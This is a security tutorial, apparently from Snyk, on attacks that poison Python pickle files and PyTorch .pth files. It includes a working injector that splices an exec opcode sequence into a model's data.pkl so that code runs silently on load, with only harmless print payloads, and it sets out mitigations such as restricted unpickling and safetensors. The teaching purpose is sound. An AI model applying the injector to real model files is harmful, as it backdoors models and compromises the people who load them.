Python Pickle Poisoning and Backdooring Pth Files

Python's pickle module is powerful for object serialization but poses security risks, as deserializing untrusted files can execute malicious code. This is particularly relevant in machine learning workflows using shared .pth files.

We will be covering both plain pickle examples and PyTorch examples. Let’s begin by checking your PyTorch setup.

# Check PyTorch Version, PyTorch GPU, torch cuda version
try:
    import torch
    print(f'PyTorch Version: {torch.__version__}')
    print(f'Path: {torch.__file__}')
    print(f'\nCUDA Available: {torch.cuda.is_available()}')
    if torch.cuda.is_available():
        print(f'CUDA Version: {torch.version.cuda}')
        print(f'Graphics Card: {torch.cuda.get_device_name(0)}')
        print(f'# of GPUs: {torch.cuda.device_count()}')
        for i in range(torch.cuda.device_count()):
            print(f'\nGPU {i} Details:')
            print(f'  Name: {torch.cuda.get_device_name(i)}')
            print(f'  Memory: {torch.cuda.get_device_properties(i).total_memory / 1024**3:.2f} GB')
    else:
        print('\nRunning on CPU only')
        import multiprocessing
        print(f'CPU Cores: {multiprocessing.cpu_count()}')
except ImportError:
    print('PyTorch is not installed. Install with: pip install torch')
except Exception as e:
    print(f'An error occurred: {str(e)}')

If you need to install PyTorch, the process can vary quite a bit depending on your setup, so it is advisable to follow the official installation instructions on the PyTorch website.

You can check the version and protocol of your pickle install like so:

$ python3 -c "import pickle; print(f'Default Protocol: {pickle.DEFAULT_PROTOCOL}\nHighest Protocol: {pickle.HIGHEST_PROTOCOL}\nAll Available Protocols: {list(range(pickle.HIGHEST_PROTOCOL + 1))}')"

The pickle module is included in Python’s standard library, so there is no need to run an installation command like pip install pickle.

What is Pickle in Python?

The pickle library is Python’s native serialization protocol. It can store complex Python objects as a sequence of “opcodes”, which are a series of executable instructions for rebuilding the serialized object. Pickle will even preserve object references and relationships between objects. 
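
To see that opcode stream for yourself, the standard library’s pickletools module can disassemble any pickled byte string. A minimal sketch (the dictionary is just an arbitrary example object):

import pickle
import pickletools

# Serialize a small object, then disassemble the resulting byte stream
example = {"name": "example", "values": [1, 2, 3]}
payload = pickle.dumps(example)

# Prints one line per opcode: its position, the instruction, and its argument
pickletools.dis(payload)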


Now, we will explore some hands-on examples of arbitrary code execution exploits in pickle.

Poisoning Python Pickles with Malicious Code

We’re going to create a pickle file and insert an instance of a class containing arbitrary code that we want to execute during deserialization of the file. Then, we will demonstrate how an end user might load this pickle file and unknowingly trigger that code.

import pickle
import random

# Generate random tabular data for our example
tabular_data = [
    {
        "id": i,
        "name": f"Item-{i}",
        "value": random.randint(1, 100),
        "category": random.choice(['A', 'B', 'C'])
    }
    for i in range(1, 6)
]

# Store the pickle data in a file named 'payload.pkl'
# At this stage, payload.pkl would behave as expected with no potentially malicious side effects during deserialization.
with open('payload.pkl', 'wb') as f:
    pickle.dump(tabular_data, f)

# Our class containing arbitrary code we want to execute:
class Malicious:
    def __reduce__(self):
        # The following code will execute during deserialization
        return (print, ("Hello World! Only load pkl files from trusted sources!",))

# Replace original data with malicious code
malicious_payload = Malicious()

# Store potentially malicious pickle data in the same file
with open('payload.pkl', 'wb') as f:
    pickle.dump([tabular_data, malicious_payload], f)

# Load the pickle file to show potentially malicious side effects
print("Loading the pickle file 'payload.pkl':")
with open('payload.pkl', 'rb') as f:
    data = pickle.load(f)

# Verify the content of the loaded data
print("\nLoaded data:")
print(data)

In our example, the payload just prints a simple Hello World, but a malicious file could just as easily install ransomware.
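
One mitigation, documented in the pickle module itself under “Restricting Globals”, is to control which globals an unpickler is allowed to resolve. The sketch below subclasses pickle.Unpickler and rejects anything not on an explicit allow-list (the allow-list shown is only an example), so loading payload.pkl raises an error instead of silently calling print:

import pickle

class RestrictedUnpickler(pickle.Unpickler):
    # Only globals on this allow-list may be resolved during deserialization
    ALLOWED = {("builtins", "list"), ("builtins", "dict")}  # example allow-list

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"Blocked global during unpickling: {module}.{name}")

# Attempting to load the poisoned file now fails loudly instead of executing the payload
with open('payload.pkl', 'rb') as f:
    try:
        data = RestrictedUnpickler(f).load()
    except pickle.UnpicklingError as e:
        print(e)

An allow-list only helps when you know exactly which classes a legitimate file should contain; for untrusted files, it is better to avoid formats that can execute code at all.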

Poisoning PyTorch Model .pth Files with Malicious Code

A similar process of embedding malicious code can be applied to .pth files, which are ZIP archives that contain a pickled data.pkl entry.

import torch
import torchvision.models as models
import zipfile
import struct
from pathlib import Path

class PthCodeInjector:
    """Minimal implementation to inject code into PyTorch pickle files (a ZIP archive containing data.pkl)."""

    def __init__(self, filepath: str):
        self.filepath = Path(filepath)

    def inject_payload(self, code: str, output_path: str):
        """Inject Python code into the pickle file."""
        # Read original pickle from the ZIP archive
        with zipfile.ZipFile(self.filepath, "r") as zip_ref:
            data_pkl_path = next(name for name in zip_ref.namelist() if name.endswith("/data.pkl"))
            pickle_data = zip_ref.open(data_pkl_path).read()

        # Find insertion point after the protocol header
        i = 2  # Skip the PROTO opcode and its version byte

        # Create an exec sequence from raw pickle opcodes
        # (SHORT_BINUNICODE is a protocol 4 opcode; the unpickler does not check it against the declared protocol)
        payload = code.encode('utf-8')
        exec_sequence = (
            b'c' + b'builtins\nexec\n' +  # GLOBAL opcode + module + attr
            b'(' +  # MARK opcode
            b'\x8c' + struct.pack('<B', len(payload)) + payload +  # SHORT_BINUNICODE with 1-byte length
            b't' +  # TUPLE
            b'R'    # REDUCE
        )

        # Insert exec sequence after the protocol header
        modified_pickle = pickle_data[:i] + exec_sequence + pickle_data[i:]

        # Write the modified pickle back into a new ZIP archive
        with zipfile.ZipFile(output_path, 'w') as new_zip:
            with zipfile.ZipFile(self.filepath, 'r') as orig_zip:
                for item in orig_zip.infolist():
                    if item.filename.endswith('/data.pkl'):
                        new_zip.writestr(item.filename, modified_pickle)
                    else:
                        new_zip.writestr(item.filename, orig_zip.open(item).read())

# Example and validation
if __name__ == "__main__":
    # Create and save original model
    torch.manual_seed(0)  # For reproducibility and comparing the outputs of the models
    model = models.mobilenet_v2()
    model.eval()
    torch.save(model, "mobilenet.pth")

    # Test original model
    test_input = torch.randn(1, 3, 224, 224)
    original_output = model(test_input)

    # Inject payload
    modifier = PthCodeInjector("mobilenet.pth")
    modifier.inject_payload("print('Hello world! Only load pth files from trusted sources!')", "modified.pth")

    # Load and test the modified model; this should print the injected message.
    # Unrestricted unpickling (weights_only=False) is what makes the attack possible;
    # recent PyTorch releases default to weights_only=True and refuse to load files like this one.
    modified_model = torch.load("modified.pth", weights_only=False)
    modified_model.eval()
    modified_output = modified_model(test_input)

    # Verify models are identical
    print("\nVerifying model equivalence:")
    print(f"Structure matches: {str(model) == str(modified_model)}")
    print(f"Outputs match: {torch.allclose(original_output, modified_output)}")
    print(f"Parameters match: {all(torch.equal(p1, p2) for p1, p2 in zip(model.parameters(), modified_model.parameters()))}")

This could be tackled more elegantly, and with more versatility, by using fickling to inject the code directly, but this minimal implementation lets us see exactly what enables the vulnerability. The opcodes composing the pickle file are read out of the archive, and our potentially malicious code is injected between the existing opcodes, so an end user loading this model sees no difference in the functionality of the loaded model.
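
You can see the injected sequence for yourself by disassembling the data.pkl entry of modified.pth with the standard library’s pickletools module. A minimal sketch (the 120-byte slice is arbitrary and only keeps the output short):

import zipfile
import pickletools

# Pull the pickled object graph back out of the modified archive
with zipfile.ZipFile("modified.pth") as zf:
    data_pkl = next(name for name in zf.namelist() if name.endswith("/data.pkl"))
    raw = zf.read(data_pkl)

# The first opcodes printed are PROTO followed by the injected
# GLOBAL 'builtins exec', SHORT_BINUNICODE, TUPLE, and REDUCE
try:
    pickletools.dis(raw[:120])
except Exception:
    pass  # disassembling a truncated stream eventually errors, but the prefix has already been printed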

Sharing Model Weights with Safetensors

Preferably, neural network weights would be shared in the safetensors format to begin with. We can modify our example above to demonstrate one way of exporting to this format in PyTorch.

import torch
from torch import nn
from safetensors.torch import save_file, load_file

# Example PyTorch model (a simple feed-forward neural network)
class SimpleModel(nn.Module):
    def __init__(self):
        super(SimpleModel, self).__init__()
        self.fc1 = nn.Linear(10, 50)
        self.fc2 = nn.Linear(50, 2)

    def forward(self, x):
        x = torch.relu(self.fc1(x))
        return self.fc2(x)

# Create an instance of the model
model = SimpleModel()

# Run a forward pass with random input (in practice this would be a trained model)
example_input = torch.randn(1, 10)
output = model(example_input)

# Save the model's weights to safetensors format
weights = model.state_dict()  # Get the state dictionary of the model
save_file(weights, "model.safetensors")

# Loading the model's weights from safetensors format
loaded_weights = load_file("model.safetensors")
model.load_state_dict(loaded_weights)

# Verify loading worked by making another forward pass
output = model(example_input)
print("\nModel output after loading weights from 'model.safetensors':")
print(output)

The resulting safetensors file contains only the corresponding weights, which can be paired with the architecture defined in code to fully load the model. However, many models, especially older ones, have not adopted this workflow: pickle files are still widely distributed, and the pickle serialization format is still the default when saving neural networks trained in PyTorch.
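
If you control a pickle-based checkpoint and want to redistribute it more safely, one option is to convert it. A minimal sketch, assuming a hypothetical checkpoint.pth that stores a plain state_dict (a dictionary of tensors) rather than a whole pickled module:

import torch
from safetensors.torch import save_file

# weights_only=True restricts unpickling to tensors and primitive containers,
# which is all we expect a state_dict checkpoint to contain
state_dict = torch.load("checkpoint.pth", map_location="cpu", weights_only=True)

# Re-serialize the same tensors in a format that cannot carry executable code
save_file(state_dict, "checkpoint.safetensors")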

Other Exploitations of Object Deserialization

Neural network weights are not the only data stored in object serialization formats like pickle. Entire datasets are often stored as pickle files as well, and in the R programming language, for example, datasets are often distributed as RDS files.

It is also possible to embed malicious code directly into the tensors – the model weights themselves – by encoding malicious code in such small perturbations to the weights that the impact on the model’s accuracy is minimal. This process is called tensor steganography. This can be paired with pickle deserialization exploits to produce an especially stealthy attack vector: it may appear that pickle is simply deserializing a tensor when in reality it is also reconstructing malicious code in memory for execution. This still requires exploiting the pickle format's vulnerability, though – safetensors would not reconstruct and execute the embedded malicious code in memory. 
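
As a rough illustration of the idea (not an actual attack), the sketch below uses NumPy to hide a short byte string in the least significant mantissa bit of float32 weights and then recover it; the function names and payload are purely hypothetical:

import numpy as np

def embed(weights: np.ndarray, payload: bytes) -> np.ndarray:
    """Hide payload bits in the least significant bit of each float32 value."""
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
    flat = weights.astype(np.float32).ravel()  # work on a copy of the weights
    assert bits.size <= flat.size, "payload too large for this tensor"
    as_int = flat.view(np.uint32)
    as_int[:bits.size] = (as_int[:bits.size] & ~np.uint32(1)) | bits
    return as_int.view(np.float32).reshape(weights.shape)

def extract(weights: np.ndarray, n_bytes: int) -> bytes:
    """Recover n_bytes of hidden payload from the least significant bits."""
    as_int = np.ascontiguousarray(weights, dtype=np.float32).ravel().view(np.uint32)
    return np.packbits((as_int[:n_bytes * 8] & 1).astype(np.uint8)).tobytes()

rng = np.random.default_rng(0)
weights = rng.standard_normal((64, 64)).astype(np.float32)
secret = b"any payload bytes could be hidden here"
stego_weights = embed(weights, secret)

# Flipping one mantissa bit changes each value by roughly 1e-7 in relative terms,
# so a model's accuracy is essentially unaffected while the payload rides along
print("Largest change to any weight:", np.abs(stego_weights - weights).max())
print("Recovered payload:", extract(stego_weights, len(secret)))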

Generative AI workflows can also include files for customization and extension of the abilities of a base model – users will often find themselves downloading LoRAs, ControlNets, IPAdapter variants, or even Textual Inversion checkpoints. The same general principles discussed here apply to these types of files as well – LoRAs are commonly shared in the safetensors format, but for the others it is less common. Be careful when downloading files that were serialized using pickle.

Additional Hands-on Practice

Snyk offers a CTF (Capture the Flag) event that relies on this exploit and teaches you how to exploit vulnerabilities related to Python pickle. The Python exploit lab is called Sauerkraut and is covered by John Hammond here.

To learn more about Python application security and vulnerabilities such as Code Injection, XPath injection, and others you’re highly encouraged to visit Snyk Learn’s Python developer security lessons.
